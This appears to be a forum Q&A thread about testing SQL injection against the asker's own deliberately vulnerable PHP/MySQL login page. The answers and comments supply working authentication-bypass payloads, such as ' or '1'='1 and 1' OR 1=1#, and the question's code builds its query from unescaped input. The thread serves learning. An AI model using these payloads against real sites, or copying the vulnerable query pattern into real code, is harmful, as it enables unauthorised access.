# How can I test my PHP MySQL injection example?

Tags: php, mysql, code-injection

I want to use PHP/Mysql injection with a login example, my code is below.

I have tried with a username of `anything' --` and an empty password but it doesn't work and I couldn't log in.

Could anyone help me?

```
<?php
mysql_connect('localhost','root','root');
mysql_select_db('hp');
?>

<form action="" method="post">
<table width="50%">
    <tr>
        <td>User</td>
        <td><input type="text" name="user"></td>
    </tr>
    <tr>
        <td></td>
        <td><input type="text" name="password"></td>
    </tr>
</table>
    <input type="submit" value="OK" name="s">
</form>

<?php
if($_POST['s']){
    $user = $_POST['user'];
    $pass = $_POST['password'];     
    $re = mysql_query("select * from zend_adminlist where user_name = '$user' and password = '$pass'");

    if(mysql_num_rows($re) == 0){       
        echo '0';
    }else{
        echo '1';
    }
}
?>
```

Answer (score 24):

One of the most common examples is this query:

```
' or '1'='1
```

If you enter this as the username and password into some unsanitized login input the query changes like so:

```
Original: SELECT * FROM USERS WHERE USER='' AND PASS='';
Modified: SELECT * FROM USERS WHERE USER='' or '1'='1' AND PASS='' or '1'='1';
```

This causes each thing its looking for to be true, as 1 will always equal 1. Problem with this method is it does not allow the selection of a particular user. Doing so you need to make it ignore the AND statement by commenting it out as seen in other examples.

Comment: I mostly try # after the query like 1' OR 1=1#  So the code after that commented out. someone also can use --

Answer (score 8):

If the value of username is:

```
 $_POST['user'] = "1' OR 1 LIMIT 1; --";
```

Then the mysql query becomes:

```
select * 
from zend_adminlist 
where user_name = '1' OR 1 LIMIT 1; --' and password = '$pass'
```

Comment: Doesn't mysql only allow 1 line per query?

Comment: 1 line , it is true but one line means one query delimiter: `;`
The `-`- means that the code after it is commented out. So actually the upper query is one query. I just breaked lines to be the code readeable.

Comment: I use # instead of -- most of the time.